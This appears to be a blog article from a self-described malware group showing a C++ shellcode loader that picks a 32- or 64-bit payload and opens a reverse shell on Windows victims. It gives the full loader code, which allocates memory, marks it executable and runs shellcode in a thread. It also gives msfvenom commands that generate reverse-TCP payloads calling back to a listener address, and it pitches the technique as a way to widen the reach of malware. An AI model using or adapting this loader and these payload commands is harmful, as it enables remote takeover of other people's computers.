Demonstrating a custom project that executes shellcode and establishes a reverse shell on both 64-bit and 32-bit victim machines.
The malware first checks whether the Windows system is 32-bit or 64-bit, then executes the corresponding shellcode based on the system architecture.
Shellcode was generated using MSFVenom, a Metasploit module commonly used for creating payloads.
Difference between 32 and 64 bits
Information by:
What's the Difference Between 32-Bit and 64-Bit? - The Plug - HelloTech
If you've looked at buying a computer recently, you might have noticed that there are 32-bit computers and 64-bit. hellotech.com
When it comes to computers, the difference between 32-bit and a 64-bit is all about processing power. Computers with 32-bit processors are older, slower, and less secure, while a 64-bit processor is newer, faster, and more secure.
But what do the numbers 32 and 64 even mean?
Your computer’s CPU functions like the brain of your computer it controls all the communication of your computer. Some computers use two or more processors. However, there are only two main categories of processors now: 32-bit processors and 64-bit processors. The type of processor that your computer uses affects its overall performance and what kind of software it can utilize.
Most computers made in the 1990s to early 2000s have a 32-bit system that can access 2³² (or 4,294,967,296) bytes (units of digital information) of RAM (random access memory). Meanwhile, a 64-bit processor can handle 2⁶⁴ (or 18,446,744,073,709,551,616) bytes of RAM. In other words, a 64-bit processor can process more data than 4 billion 32-bit processors combined.
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream>
#include <conio.h>
using namespace std;
int Is64BitWindows()
{
#if defined(_WIN64)
return 0;
#elif defined(_WIN32)
return 1
#else
return 2;
#endif
}
unsigned char payload64[] = "";
unsigned char payload32[] = "";
int arq;
unsigned int my_payload_len64 = sizeof(payload64);
unsigned int my_payload_len32 = sizeof(payload32);
int main(void)
{
arq = Is64BitWindows();
void *my_payload_mem; // memory payload64fer for payload
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
if (arq == 0)
{
cout << "Sending Shell 64 bits";
getch();
my_payload_mem = VirtualAlloc(0, my_payload_len64, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(my_payload_mem, payload64, my_payload_len64);
rv = VirtualProtect(my_payload_mem, my_payload_len64, PAGE_EXECUTE_READ, &oldprotect);
if (rv != 0)
{
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)my_payload_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
}
else if (arq == 1)
{
cout << "Sending Shell 32 bits";
getch();
my_payload_mem = VirtualAlloc(0, my_payload_len32, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(my_payload_mem, payload32, my_payload_len32);
rv = VirtualProtect(my_payload_mem, my_payload_len32, PAGE_EXECUTE_READ, &oldprotect);
if (rv != 0)
{
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)my_payload_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
}
return 0;
}Here two function are used :
-
Is64BitWindows: determines if the system is 64-bit (returns 0), 32-bit (returns 1), or other (returns 2). -
Main: This function checks this result and runs the appropriate shellcode based on the system architecture."
Sample code provided below :
Executing Malicious Shell-Code with C++
Introductionmedium.comz
When compiled and executed with the generated shellcode, the sample runs according to the system architecture.
Payload 64 bits:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.135 LPORT=1212 -f cPayload 32 bits:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.135 LPORT=1212 -a x86 -f cExecuting the sample on a 64-bit machine to demonstrate 64-bit shellcode execution.
Detects a 64-bit machine and establishes a reverse shell connection.
That’s the end of the article. This approach is a practical way to expand the impact of your malware by targeting both 32-bit and 64-bit systems.
Thanks for reading :D
- Malforge Group




